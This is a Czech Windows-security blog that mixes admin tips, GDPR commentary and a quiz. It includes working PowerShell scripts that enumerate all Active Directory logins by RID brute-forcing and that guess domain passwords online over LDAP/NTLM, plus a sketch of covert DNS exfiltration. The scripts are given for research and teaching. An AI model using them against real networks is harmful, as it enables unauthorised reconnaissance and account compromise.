Skip Ribbon Commands
Skip to main content

Ondrej Sevecek's Blog

:

Engineering and troubleshooting by Directory Master!
červen 20
Skupiny na španělském serveru

Tak u nás aspoň překladatelé nekouří při práci a i když překládají jména systémových služeb​, tak aspoň nesahají na jména skupin. To už je moc, řekl bych:



květen 15
TechEd 2018 - řešení nedostatků z přednášky o účtech pro služby

Tak jsem to dořešil, trvalo to cca 5 minut. Sakra, to se tak na přednáškách stává :-)

​a) nejprve mi nešel NIRSOFT nástroj NETPASS, který mi měl zobrazit hesla naplánovaných úloh. Nojo, jenže já jsem spouštěl omylem 32bitovou verzi. NETPASS64 funguje v pohodě.

b) nemohl jsem se také dostat do webové aplikace, kterou jsem přenastavil, aby běžela pod Group Managed Service accountem (gMSA). A přitom bylo vidět, že Kerberos už funguje a ticket mi to vydalo na klientovi v pořádku. Nojo, jenže ona ta aplikace původně běžela pod účtem IIS APPPOOL (ApplicationPoolIdentity) a zůstala jí zapnuta Kernel Mode autentizace. Když jsem ji vypnul, tak se to rozběhlo.

Jsem prostě jenom chaotik :-)

květen 15
TechEd 2018 - Slajdy ze všech přednášek

Jsou (nebo přesněji budou) k nalezení zde https://www.sevecek.com/presentations/teched2018

Postupně to aktualizuji, takže například do Fiddleru jsem přidal registrové klíče k vypnutí Extended Protection for Authentication (neboli Channel Binding) pro RD Gateway

květen 14
TechEd 2018 - Přednáška o Fiddleru

​Slajdy k přednášce o tom, jak jednoduše používat Fiddler k průzkumu HTTPS komunikací, bez ohledu na to, jestli to je prohlížeč, nebo GUI program, si můžete stáhnout zde.

Současně je zde zdrojový kód skriptu pro nastavení proxy (ať už to je Fiddler nebo něco jiného). Baťáček je zajímavé také tím, že si umí sám požádat o zvýšení UAC oprávnění (elevate - spustí se podruhé zvýšeně pomocí parametru -Verb runas):

fiddle.bat

@ECHO OFF

IF "%1" == "noElevate" GOTO NoElevate

powershell -NoLogo -ExecutionPolicy Bypass -Command "Start-Process %~d0%~p0%~n0.bat noElevate -Verb runas"
GOTO Exit

:NoElevate

powershell -NoLogo -ExecutionPolicy Bypass -File "%~d0%~p0%~n0.ps1"

:Exit

fiddle.ps1

[string] $fdl = (Read-Host 'Fiddler machine name (or [-] to reset proxy)').Trim()

if ($fdl -eq '') {

  $fdl = 'localhost'
}

if (($fdl -ne '-') -and ($fdl -ne '[-]')) {

  if ($fdl -notlike '*?:?*') {

    $fdl = '{0}:8888' -f $fdl
  }

  Set-ItemProperty 'Microsoft.PowerShell.Core\Registry::HKEY_USERS\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\Internet Settings' ProxyServer $fdl
  Set-ItemProperty 'Microsoft.PowerShell.Core\Registry::HKEY_USERS\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\Internet Settings' ProxyEnable 1

  Set-ItemProperty 'Microsoft.PowerShell.Core\Registry::HKEY_USERS\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\Internet Settings' ProxyServer $fdl
  Set-ItemProperty 'Microsoft.PowerShell.Core\Registry::HKEY_USERS\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\Internet Settings' ProxyEnable 1

  Set-ItemProperty 'Microsoft.PowerShell.Core\Registry::HKEY_USERS\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings' ProxyServer $fdl
  Set-ItemProperty 'Microsoft.PowerShell.Core\Registry::HKEY_USERS\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings' ProxyEnable 1

  Set-ItemProperty 'Microsoft.PowerShell.Core\Registry::HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings' ProxyServer $fdl
  Set-ItemProperty 'Microsoft.PowerShell.Core\Registry::HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings' ProxyEnable 1

  # Note: for example, the "Bypass proxy for local addresses" would be specified as 
  Remove-ItemProperty 'Microsoft.PowerShell.Core\Registry::HKEY_USERS\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\Internet Settings' ProxyOverride
  Remove-ItemProperty 'Microsoft.PowerShell.Core\Registry::HKEY_USERS\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\Internet Settings' ProxyOverride
  Remove-ItemProperty 'Microsoft.PowerShell.Core\Registry::HKEY_USERS\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings' ProxyOverride
  Remove-ItemProperty 'Microsoft.PowerShell.Core\Registry::HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings' ProxyOverride

  netsh winhttp set proxy $fdl | Out-Null

  $remoteFdl = $fdl.Split(':')[0]
  if (($remoteFdl -ne 'localhost') -and ($remoteFdl -ne '127.0.0.1')) {

    $remoteAdmin = (Read-Host 'Credentials to make Fiddler certificate trusted (or nothing to skip)').Trim()

    if (($remoteAdmin -ne '') -and ($remoteAdmin -ne '-')) {

      $remotePwd = (New-Object System.Management.Automation.PSCredential ('DummyLogin', (Read-Host 'Password' -AsSecureString))).GetNetworkCredential().Password

      [System.Management.ConnectionOptions] $wmiRegOptions = New-Object System.Management.ConnectionOptions
      $wmiRegOptions.Impersonation = [System.Management.ImpersonationLevel]::Impersonate
      $wmiRegOptions.Username = $remoteAdmin
      $wmiRegOptions.Password = $remotePwd
      $wmiRegOptions.EnablePrivileges = $true
      [System.Management.ManagementScope] $wmiRegScope = New-Object System.Management.ManagementScope (('\\{0}\root\default' -f $remoteFdl), $wmiRegOptions)
      $wmiRegScope.Connect()
      [System.Management.ManagementClass] $wmiReg = New-Object System.Management.ManagementClass ($wmiRegScope, 'stdRegProv', $null)

      [System.Management.ManagementBaseObject] $wmiRes = $wmiReg.EnumKey(2147483650, 'Software\Microsoft\SystemCertificates\Root\Certificates')
      foreach ($oneThumbprint in ([string[]] $wmiRes.sNames)) {

        $wmiRes = $wmiReg.GetBinaryValue(2147483650, 'Software\Microsoft\SystemCertificates\Root\Certificates\{0}' -f $oneThumbprint, 'Blob')
        [Security.Cryptography.X509Certificates.X509Certificate2] $oneCert = New-Object Security.Cryptography.X509Certificates.X509Certificate2 @(, ([byte[]] $wmiRes.uValue))

        if ($oneCert.Subject -eq 'CN=DO_NOT_TRUST_FiddlerRoot, O=DO_NOT_TRUST, OU=Created by http://www.fiddler2.com') {

          $rootStore = New-Object System.Security.Cryptography.X509Certificates.X509Store ('Root', 'LocalMachine')
          $rootStore.Open('MaxAllowed')
          $rootStore.Add($oneCert) 
          $rootStore.Close()
        }
      }       
    }
  }

} else {

  Remove-ItemProperty 'Microsoft.PowerShell.Core\Registry::HKEY_USERS\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\Internet Settings' ProxyServer
  Remove-ItemProperty 'Microsoft.PowerShell.Core\Registry::HKEY_USERS\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\Internet Settings' ProxyEnable

  Remove-ItemProperty 'Microsoft.PowerShell.Core\Registry::HKEY_USERS\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\Internet Settings' ProxyServer
  Remove-ItemProperty 'Microsoft.PowerShell.Core\Registry::HKEY_USERS\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\Internet Settings' ProxyEnable

  Remove-ItemProperty 'Microsoft.PowerShell.Core\Registry::HKEY_USERS\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings' ProxyServer
  Remove-ItemProperty 'Microsoft.PowerShell.Core\Registry::HKEY_USERS\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings' ProxyEnable

  Remove-ItemProperty 'Microsoft.PowerShell.Core\Registry::HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings' ProxyServer
  Remove-ItemProperty 'Microsoft.PowerShell.Core\Registry::HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings' ProxyEnable

  netsh winhttp reset proxy | Out-Null
}

Write-Host ('')
Read-Host 'Press ENTER to exit'

 

květen 02
Žvejk

Rozhodl jsem se, že konečně vyřeším letitý problém termínu hash. Buď se to musí používat v prvním pádu, nebo se počeští a skloňuje, což je ještě horší. Bohužel čeština nezná (nebo možná jen já neznám) slovo pro to, co vznikne v ústech po rozkousání a proslinění sousta potravy před tím, než je to odesláno dolů hltanem, nebo vyplivnuto, pokud při zpracování narazíme na něco nechutného. Takže nově zavádím termín:

žvejk

Odpovídající slovesa zavádím:

sežvejknout, žvejkat

Záměrně jsem vybral nespisovnou formu (tedy až do tohoto okamžiku, kdy se to zespisovnilo), aby to bylo v technické dokumentaci jasně čitelné a rozeznatelné na první pohled.

Příklady užití

Dnes už prohlížeče vyžadují certifikáty číslicově podepsané za pomoci moderních žvejků jako je SHA256. Otisk certifikátu se ale stále provádí žvejkem SHA-1, který je k tomu účelu stále dostatečně bezpečný a přitom nabízí výbornou míru slučitelnosti.

Dokument se sežvejkne pomocí SHA256 a to se číslicově podepíše pomocí RSA.

Hesla se obvykle ukládají ve tvaru žvejků. Pokud získáte žvejk hesla, můžete ho zkusit prolomit hrubou silou pomocí různých 3D GPU žvejkaček, nebo zkusit nějakou duhovou tabulku.

duben 13
Co jsou osobní údaje a co musíme chránit

Ach jo. Lidi! Nejhorší je, že ani různí právníci a rádoby poradci prostě nětuší, co to jsou osobní údaje. Takže GDPR definice podle článku 4, odstavec 1:

„osobními údaji“ veškeré informace o identifikované nebo identifikovatelné fyzické osobě ...

Veškeré!

Osobním údajem je tedy také historie nákupů ve vašem e-shopu, detaily o vaší půjčce, informace o tom, že jste si v masně koupili dva párky, že vlastním kolo značky Merida staré 11 let, že můj synek se jmenuje Janek, že máte rádi pálivej stejk, co si stahujete za filmy a které novinové články jste si přečetli, i když jste je nelajkovali, že jste byli na služební cestě v Mnichově, fotka vaší boty i fakt, že pracujete ve firmě XY, značka SPZ vašeho rodinného vozu, hodnota faktury za plyn, teplou vodu a telefon, nebo faktura za novou koupelnu.

Ani jedno z toho předchozího není identifikující údaj. To sice znamená, že podle této informace vás asi nikdo přesně neidentifikuje, nejspíš ani podle kombinace těchto údajů. Ale jsou to pořád vaše osobní údaje a musí požívat dostatečnou ochranu.

Takže není potřeba chránit jenom emailovou adresu a telefonní číslo a fotky obličejů. Ano, to jsou ty identifikující údaje. Ale uvědomte si, že únik samotných identifikujících údajů sám o sobě není zrovna to riziko, kvůli kterému tady GDPR přichází a vůbec stávající ochrana osobních údajů dávno je.

To že unikne seznam emailových adres ohrožuje koho a jak? Jo mohl by vám chodit spam. Tý jo, tak to se třesu strachem. Naopak únik těch prvních neidentifikujících údajů, které je skrze nějaký identifikující (nebo jejich kombinaci) možné navázat na fyzickou osobu, je to skutečné riziko.

Tzn. pokud unikne seznam jmen plus hodnota faktury za stavbu nové koupelny, ohrožuje to fyzické osoby například tím, že se zloději domáknou těch bohatších a půjdou se k nim podívat. Sousedé vám budou závidět a pomlouvat vás, za co utrácíte. Ohrožuje to i ty chudší faktury, protože se jim budou ostatní posmívat, že mají sračkovou koupelnu. Pokud někdo vystaví na netu seznam jmen a SPZ, jasně vás budou někteří hejtovat pokud pojedete někde rychle, pomalu, nebo budete stát, nebo předjíždět, nebo naopak předjíždět nebudete.

Takže chránit je potřeba všechny informace o fyzických osobách, které jsou na tyto osoby nějak, jakkoliv, identifikovatelné.

Při hodnocení úniku je potom potřeba si uvědomit co skutečně uniklo. Ne jestli unikl seznam emailů, hesel a fotek. To jsou všechno jen identifikující údaje, které moc rizika nepředstavují (kromě případu, kdy na fotce máte obřího jebáka co se zrovna chystá prasknout, nebo se drbete na zadku hřebínkem pro panenky).

Aby to byl únik, není ani nutné, aby identifikovatelnost osob byla nějaká "širokopásmová". Stačí, že se někdo, kdo o někom jiném něco nevěděl, je schopen o něm něco dozvědět :-)

Takže si buďte jisti, že i reklamní bilboard Lidl s nabídkou "každá pokladní 25 000+" je tedy kurva zveřejnění osobních údajů! Jestli je kdokoliv schopen přijít do Lidla a vidí tam pokladní, nebo ví, že jeho sousedka je tam pokladní, tak se právě dozvěděl, že ta osoba vydělává 25+.

říjen 25
Nesmysly a skutečná rizika

Už mě začíná otravovat ta šou ohledně KRACKu. Určitě jste o tom taky slyšeli. Prostě jde dešifrovat WPA2. A co jako?

Ono se WiFi snad někdy považovalo samo o sobě za nějak bezpečné? Vždyť to byla vždycky jenom otázka alespoň trošku porovnatelné bezpečnosti s kabelovým ethernetem. Nic lepšího. O nic lepšího se nikdo ani nesnažil. Bylo snad od jakživa jasné, že bez VPN nebo TLS nebo IPSec se vevnitř neobejdete. Na bezpečnost WPA2 doufám nikdo nezávisí.

Takže co je KRACK? Je to prostě jenom pěkná vědecko-kryptologická chyba.

Je tu ale mnohem lepší chyba

https://crocs.fi.muni.cz/public/papers/rsa_ccs17

říjen 05
Změna CSP/KSP poskytovatele v existujícím PFX souboru

Když exportujete certifikát i s jeho soukromým klíčem (private key) tak vytváříte PFX soubor (neboli PKCS12 formát souboru, někdy také přípona P12). Problém na Windows je ten, že tento soubor obsahuje navíc jedno políčko (rozšíření, extension) s názvem kryptografického poskytovatele (cryptographic provider), který daný privátní klíč zrovna spravuje a v němž byl původně uložen.

Poskytovatel je buď tzv. starší CSP (cryptographic services provider), nebo tzv. novější CNG/KSP (cryptography next generation, key storage provider). Jaké všechny takové poskytovatele na počítači máte zjistíte jednoduše pomocí certutil -csplist. Z daného PFX souboru tuto informaci dostanete pomocí certutil -dump.

Soubor PFX je tím pádem na dále vázán na tohoto poskytovatele. Je možné, že na cílovém stroji takový poskytovatel neexistuje. Nebo aplikace, pro kterou certifikát instalujete, neumí právě toho původního použít, i když by byl na počítači k dispozici (viz. velká ne-podpora v mnoha moderních programech).

Název poskytovatele je v souboru uložen jen jako prostý text. Není k tomu nic vázáno, takže pokud je potřeba ho změnit, stačí nějak upravit jeho hodnotu. Samozřejmě by mohly být problémy s importem, pokud byste se snažili dostat do poskytovatele třeba delší privátní klíč, než by on sám uměl, ale to je málo pravděpodobné, běžné certifikáty umí většina z nich.

K úpravě potřebujete ale openssl, protože zabudovaný certutil to neumí. Openssl stáhnete někde na internetu. No a potom už jenom použijete PowerShell:

$pwd = 'Pa$$w0rd'
$openSsl = 'C:\OpenSSL-Win32\bin\openssl.exe'
$pfx = 'C:\ONDRA\pfx-with-wrong-csp-to-replace.pfx'

$newCSP = 'Microsoft Enhanced RSA and AES Cryptographic Provider'

$pem = [IO.Path]::ChangeExtension($pfx, '.pem')
$newPfx = [IO.Path]::ChangeExtension($pfx, '.newCSP.pfx')

Write-Host ('Original PFX file: {0}' -f $pfx) -Fore Green
certutil -dump -p $pwd $pfx

& $openssl pkcs12 -in $pfx -out $pem -passin "pass:$pwd" -passout "pass:$pwd"

& $openssl pkcs12 -export -in $pem -out $newPfx -CSP $newCSP -passin "pass:$pwd" -passout "pass:$pwd"

Write-Host ('New PFX file: {0}' -f $newPfx) -Fore Green
certutil -dump -p $pwd $newPfx
září 29
Seznam všech loginů z Active Directory

Někde to tady mám, ale nemůžu to najít a docela často to potřebuju, takže znovu :-)

Úkol zní - vylistovat všechny loginy z Active Directory (ADDS) za použití minimálních oprávnění a tak, aby to pokud možno šlo kdykoliv. A ono to jde. Bez ohledu na oprávnění, která máte na objektech a organizačních jednotkách v AD, tahle metoda funguje pod jakýmkoliv ověřeným účtem vždy. Protože nepoužívá LDAP připojení, ale nechává si pomocí SAM rozhraní překládat SIDy na loginy. Takže stačí libovolný účet, který je Authenticated Users.

Jak to funguje? Každý účet, účet počítače, nebo skupina má SID. Všechny SIDy v jedné doméně jsou stejné, kromě koncovky (RID). RIDy vznikají tak, že se pouze inkrementují pro každý nový účet. Stačí tedy nechat si přeložit všechny SIDy od 1 do 2 miliard :-) Samozřejmě skončíte jakmile cítíte, že tam už žádné další nebudou.

function global:Get-PrimaryDomainSID ()
{
  # Note: this script obtains SID of the primary AD domain for the local computer. It works both
  #       if the local computer is a domain member (DomainRole = 1 or DomainRole = 3)
  #       or if the local computer is a domain controller (DomainRole = 4 or DomainRole = 4).
  #       The code works even under local user account and does not require calling user
  #       to be domain account. This should also work on any AD domain regardless of language
  #       mutation because, hopefully, the krbtgt account has always the same name

  [string] $domainSID = $null

  [int] $domainRole = gwmi Win32_ComputerSystem | Select -Expand DomainRole
  [bool] $isDomainMember = ($domainRole -ne 0) -and ($domainRole -ne 2)

  if ($isDomainMember) {

    [string] $domain = gwmi Win32_ComputerSystem | Select -Expand Domain
    [string] $krbtgtSID = (New-Object Security.Principal.NTAccount $domain\krbtgt).Translate([Security.Principal.SecurityIdentifier]).Value
    $domainSID = $krbtgtSID.SubString(0, $krbtgtSID.LastIndexOf('-'))
  }

  return $domainSID
}

$domainSID = Get-PrimaryDomainSID

(500..10000) | % { 

  $user = New-Object Security.Principal.SecurityIdentifier $domainSID-$_
  $errorActionPreference = 'SilentlyContinue'
  $user.Translate([Type]::GetType('System.Security.Principal.NTAccount')).Value
  $errorActionPreference = 'Continue'
}
září 26
Hackerfest folouap

Minulý týden byla konference HackerFest, údajně se během ní konal nějaký kvíz pro účastníky, a kdo nejlépe odpovídal, něco asi dostal :-)

Pro zábavu, zde jsou otázky, kterými jsem já přispěl do kvízu. Jo a nejprve ještě prezentace z konference a ještě jedna z TechEd 2017, která se hodí tématicky a byl o ni zájem

HackerFest 2017 - Credentials guard and (non)shielding
TechEd 2017 - UEFI, Secure Boot, TPM and Device Guard

A teď už ty slíbené otázečky. A rovnou upozorňuju, že slovo "renovovanější" je v otázce číslo 3 schválně :-)

  1. Na jedné PC stanici ve větší podnikové Active Directory síti byl při pravidelné noční kontrole souborů na disku objeven malware. IT oddělení odpojilo počítač od sítě, odvezlo na incident response oddělení, kde ho borci odvirovali přímo pomocí stejného antiviru, který nákazu detekoval. Opětovná kontrola souborů na disku už žádný další malware nehlásí. Je možné vrátit počítač zpět do provozu?
    1. ano, je to čisté, když se to odvirovalo
    2. ne, protože stejný antivirus, který to detekoval, to nedokáže spolehlivě odvirovat
    3. ne, protože nákaza se už musela rozšířit po síti a jednoznačně už napadla i další počítače
    4. ne, protože nevíme, co na počítači malware způsobil, jestli to nebyl jenom trojský kůň, skrz kterého se do stroje dostaly další, kdovíjaké nákazy
  2. Na Windows operačních systémech v Active Directory doméně se používá služba (service), která se spouští pod doménových uživatelským účtem. Jedná se o účet vyhrazený pro běh této služby na více počítačích. Heslo tohoto účtu služby se zadává ručně při instalaci této služby na počítačích. Jak je na počítačích dlouhodbě uloženo?
    1. ve formě MD4 hash v HKLM registrech
    2. ve formě MD5 hash pomocí DPAPI
    3. ve formě LM hash v HKCU registrech
    4. v plné formě v HKLM registrech
  3. Podniková Active Directory síť s několika stovkami stanic využívá naplno všechny dostupné software ochrany, které nabízí používané Windows 10 1703 x64 operační systémy. Jedná se zejména o BitLocker, UEFI Secure Boot, Device (Credentials) Guard, UAC, Remote Credentials Guard, Windows Defender, Windows Firewall a pod. Admini se tedy ke správě stanic neobávají používat přímo uživatelské účty, které jsou členem skupiny Domain Admins a to jak pro přihlašování lokálně, tak přes RDP apod. Je to chyba?
    1. není to chyba, v pořádku, tyto technologie je ochrání
    2. není to chyba, jen by to chtělo vyměnit antimalware za nějaký pokročilejší, renovovanější, který navíc optimalizuje registry a paměť
    3. není to chyba, stačí mít hesla dlouhá alespoň 15 znaků a vše je v pořádku
    4. je to chyba, evidentně nikdy neslyšeli pojmy jako SSO, hardware/software keylogger, špionážní kamera atd. Doporučujeme buď vyměnit doktora, nebo alespoň nějaké jiné prášky
  4. V podnikovém prostředí Active Directory sítě je implementována separace privilegovaných účtů správců od účtů uživatelských pro běžnou práci. Ke správě se vždy používají pouze vyhrazené admin účty. Správci mají samozřejmě i osobní uživatelské účty pod kterými pracují s aplikacemi jako je prohlížení internetu, email, helpdesk a různé další podnikové agendy. Privilegované účty jsou používány přesně tak, jak to má být, jen pro správu omezených skupin počítačů na definovaných úrovních rizikovosti. Například účty pro správu Active Directory, účty pro správu serverů, nebo účty pro správu různých skupin stanic a notebooků. I přesto se jeden z obyčejných zaměstnanců dokázal nabourat skrz celou síť. Evidentně nějak zjistil heslo účtu doménového admina. Je to účet správce, který má pod svou kontrolou jak účet člena skupiny Domain Admins, tak i jiný účet správce stanic a další oddělený účet pro správu serverů. Je potvrzeno, že účet žádného doménového admina se na žádné stanici nikdy nepoužil. Útočník nikdy neměl přístup nikam jinam, než ke své doménové stanici a měl k dispozici pouze svůj obyčejný omezený uživatelský účet. Co je nejpravděpodobnější příčina toho, že útočník zjistil heslo účtu doménového admina?
    1. uhádl ho z hlavy na několik pokusů
    2. vyzkoušel ho online přes LDAP spojení na DC pomocí automatického hádače hesel
    3. získal hash tohoto hesla z logon keše na své stanici a kreknul heslo pomocí 3D GPU grafické karty
    4. ten blázen správce má na všech svých oddělených účtech stejné heslo
září 15
Online zkoušečka hesel

Už jsem si dlouho chtěl naprogramovat online zkoušečku hesel vůči Active Directory. Zajímalo mě, jak rychlé to je, když neexistuje zamykání účtů (account lockout). Tak jsem si to naprogramoval.

Výsledek je pro dva druhy ověření různý. Použil jsem NTLMv2 a Simple Bind (neboli Basic autentizaci, tedy plaintextové heslo). Schválně jsem nepoužil Kerberos, protože to by se musely generovat tikety pro každé zkoušené heslo a byť by to tedy selhávalo už dopředu při vydávání Kerberos TGT, tak by to bylo stejně pomalejší. Protože pro každé takové vydání by se muselo nahodit nové TCP spojení a to ještě dvakrát - bez pre-authentication a potom s ní. V případě ldap simple bind je to jenom jeden round-trip.

Takže jen NTLMv2 a simple bind. Používám samozřejmě TLS pro simple bind, protože to může být vyžadováno politikami. Samo TLS nijak výkonu nevadí, protože se to celé odehrává v rámci jednoho, už nahozeného, TCP spojení, takže ani TLS handshake znovu neprobíhá.

Dokáže to zkoušet 230 hesel za sekundu přes NTLMv2.

Nebo 470 hesel za vteřinu přes Simple bind.

function global:Try-LdapPasswordsFast (
    [string] $dc, 
    [string] $login, 
    [string] $domain, 
    [switch] $authBasic, 
    [int] $tryLength = 5,
    [string] $charSet = 'abcdefgh' #'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890'
    )
{
  if (([AppDomain]::CurrentDomain.GetAssemblies() | % { $_.Evidence.Name }) -notcontains 'System.DirectoryServices.Protocols') {

    [void] ([System.Reflection.Assembly]::LoadWithPartialName('System.DirectoryServices.Protocols'))
  }

  [System.DirectoryServices.Protocols.LdapConnection] $conn = $null
  [System.Management.Automation.ActionPreference] $errorActionBackup = $global:errorActionPreference
  $global:errorActionPreference = [System.Management.Automation.ActionPreference]::Stop

  try {

    if ($authBasic -and ($dc -notlike '?*:?*')) {

      $dc = $dc + ':636'
    }

    $conn = New-Object System.DirectoryServices.Protocols.LdapConnection $dc

    if ($authBasic) {

      $conn.SessionOptions.ProtocolVersion = 3
      $conn.SessionOptions.Signing = $false
      $conn.SessionOptions.Sealing = $false
      $conn.SessionOptions.SecureSocketLayer = $true
      $conn.AuthType = [DirectoryServices.Protocols.AuthType]::Basic

    } else {

      $conn.SessionOptions.ProtocolVersion = 3
      $conn.SessionOptions.Signing = $true
      $conn.SessionOptions.Sealing = $false
      $conn.SessionOptions.SecureSocketLayer = $false
      $conn.AuthType = [DirectoryServices.Protocols.AuthType]::Ntlm
    }

    [double] $pwdCount = 1;
    for ($i = 0; $i -lt $tryLength; $i++) { $pwdCount = $pwdCount * $charSet.Length }
    Write-Host ('Will try passwords: len = {0} | charset = {1} | pwds = {2}' -f $tryLength, $charSet.Length, $pwdCount)


    [byte[]] $charMatrix = New-Object byte[] $tryLength
    for ($i = 0; $i -lt $charMatrix.Length; $i ++) { $charMatrix[$i] = 0 }

    [byte] $positionMax = $charSet.Length - 1
    [int] $iteration = 0
    [string] $foundPwd = [string]::Empty
    [System.Text.StringBuilder] $pwdMachine = New-Object System.Text.StringBuilder $charMatrix.Length
    for ($i = 0; $i -lt $charMatrix.Length; $i ++) { [void] $pwdMachine.Append('.') }

    $error.Clear()
    $dtStart = [DateTime]::Now

    do {

      $iteration ++

      [byte] $i = 0
      while ($i -lt $charMatrix.Length) {

        if ($charMatrix[$i] -eq $positionMax) {

          $charMatrix[$i] = 0
          $i ++
          continue
          
        } else {

          $charMatrix[$i] = $charMatrix[$i] + 1
          break
        }
      }

      for ($k = 0; $k -lt $charMatrix.Length; $k ++)
      {
        $pwdMachine[$k] = $charSet[$charMatrix[$k]]
      }

      $onePwd = $pwdMachine.ToString()
    
      $cred = New-Object System.Net.NetworkCredential $login, $onePwd, $domain
      [bool] $check = $true

      try {

        $conn.Bind($cred)

      } catch {

        #Write-Host ('Error on password: {0} | {1}' -f $onePwd, $_.Exception.Message)
        $check = $false
      }

      if ($check) {

        $foundPwd = $onePwd
        break
      }

      if (($iteration % 27000) -eq 0) {

        $dtProcessDiff = [DateTime]::Now - $dtStart
        Write-Host ('Progress at: {0,8:D} | {1} | {2,7:N1} min | pwds/sec = {3:N0}' -f $iteration, $onePwd, $dtProcessDiff.TotalMinutes, (([double] $iteration) / $dtProcessDiff.TotalSeconds))
      }

    } while ($i -lt $charMatrix.Length)

    $dtEnd = [DateTime]::Now

    Write-Host ('Time stats: iterations = {0} | start = {1} | end = {2} | took = {3:N1} min' -f $iteration, $dtStart.ToString('yyyy-MM-dd HH:mm:ss'), $dtEnd.ToString('yyyy-MM-dd HH:mm:ss'), ($dtEnd - $dtStart).TotalMinutes)
    
    if ([string]::IsNullOrEmpty($foundPwd)) {

      Write-Host ('Didnt find the password')

    } else {

      Write-Host ('Found password: {0}' -f $foundPwd)
    }
  
  } catch {

    Write-Host ('Error: {0}' -f $_.Exception.Message)

  } finally {

    if (-not ([object]::Equals($null, $conn))) {

      $conn.Dispose()
    }

    $global:errorActionPreference = $errorActionBackup
  }
}

Tak jen pro představu.

srpen 31
Únik hesel z mall.cz

Pěkně: https://www.lupa.cz/clanky/v-uniku-z-mallu-je-pres-tri-ctvrte-milionu-jmen-hesel-a-telefonnich-cisel-v-citelne-podobe/

Článek se zabývá primárně krádeží hesel, ale vynechal několik podstatných bodů, které je dobré znovu a znovu opakovat až do zblbnutí:

  • řeči o "prolomenosti" MD5 jsou nesmysl. Z MD5 heše se heslo musí stejně pořád krekovat a pořád doba kreku závisí na délce a kvalitě hesla. Možná je to rychleji než dříve, ale pořád brute-force. Takže tahle krádež byla plaintextová.
  • kdo si do citlivých služeb dává stejná hesla, je blázen. Bez ohledu na to jak si to služba ukládá, stejně v nějakém okamžiku vidí heslo v čisté formě (například vyplněné do formuláře). Pokud bude napadena, stejně útočník hesla hostane čistá, když bude chtít.
  • jak víme, že to byl nějaký hacker? Nejspíš to byl inside-job nějakého milého zaměstnance.
  • tady nejde ani tak o krádež nějakých hesel, tady jde o únik osobních údajů. Dnes mají ještě strop 10 000 000 CZK, od května 2018, kdy vstoupí v účinnost nařízení GDPR, budou mít strop na pokutu 10 000 000 EUR a to ještě nepočítám možné soudy s poškozenými a náhrady jejich škod.
  • incidenty se vždycky dějí, nelze jim zabránit, rizika lze pouze minimalizovat. Případně si mohou riziko přenést na někoho jiného. Předpokládám, že začne velký business s pojistkami proti GDPR pokutám :-)
  • a proto taky GDPR zdůrazňuje potřebu anonymizace a pseudonymizace osobních údajů plynoucí z povinnosti zpracovávat osobní údaje jen po opravdu nutnou dobu. Pokud to neděláte, bude pokuta vyšší :-)
srpen 25
Rada špionážním agenturám

Mimochodem - na letošním www.hackerfest.cz zbývá už jen 20 míst!!

Ne že bych si myslel, že je to už dávno nenapadlo samo, ale chtěl jsem na to spíš už několikrát upozornit. Zrovna řešíme u zákazníka problém s tím, že jim někdo nějak z vnitřní sítě krade loginy a zkouší potom z internetu hesla. Dokonce evidentně ví, co jsou zajímavé adminské účty, protože zkouší jen ty "správné". A to tam neexistuje nic, jako výchozí loginy typu administrator, samozřejmě.

Hesla jsou kvalitní, zamykání účtů je zapnuto, ale velký objem pokusů o heslo způsobuje zbytečné provozní problémy.

Zjistit odkud jsou hesla zkoušena není až takový problém. Problém je zjistit, ze kterého z tisíců počítačů se ty naše loginy odesílají útočníkovi. Obecně řečeno, v Active Directory je možno vždy vylistovat seznam loginů, pokud máte LAN připojení na DC a vás listovací program se spouští pod nějakým libovolným (obyčejným) ověřeným účtem. Včetně členství v citlivých skupinách. Viz. můj dřívější článek.

A samozřejmě plno dalších věcí je v sítích alespoň pro čtení.

Stačí, aby si nějaký uživatel stáhnul "užitečný prográmek", který ví co chce zjistit, a může velmi efektivně a nenápadně olíznout celou síť. Nenápadně, protože dělá samozřejmě jen běžné, naprosto legitimní čtení.

Je jasné, že program nic zásadního změnit nemůže, protože běží pod obyčejným uživatelem. Ale zkoumat může. A měnit možná ani nechce.

Odesílání dat do internetu se dneska dělá pomocí DNS dotazů, což je opět zcela legitimní a téměř nedetekovatelné, pokud toho není nějaký velký objem.

Kdyby ten program zkoušel hesla přímo z vnitřní sítě, mohli bychom ho chytit. Ale když je potichoučku a jen občas něco oskenuje, tak to nenajdete. Žádný antivirus vám samozřejmě nepomůže, protože si toho ještě nikdo nevšiml. Protože to nic viditelně špatného nedělá.

A teď k těm špionům

Dneska jsem objevil na technetu další debilní článek s nabídkou bezvadných a zaručeně nepostradatelných prográmků, které vám pomůžou se vším, samy vám utřou zadek, uvaří domácí pivo, podrbou vašeho psa a samozřejmě u toho optimalizují registry a paměť. A hlavně je to ZADARMO! http://technet.idnes.cz/uzitecne-aplikace-pro-kazdy-den-dil-683-dw2-/software.aspx?c=A170728_095345_software_dvr

Já být provozovatelem nějaké špionážní organizace, zaměstnal bych několik programátorů. Není potřeba moc, třeba pět?

A tihle kluci by měli za úkol chrlit kvanta užitečných utilitek. Ideálně věci, které zajímají jak běžného uživatele, tak dokonce správce. Vzpomeňte si sami, kolikrát stahujete z netu nějaké nástroje. Napadají mě tyto příklady:

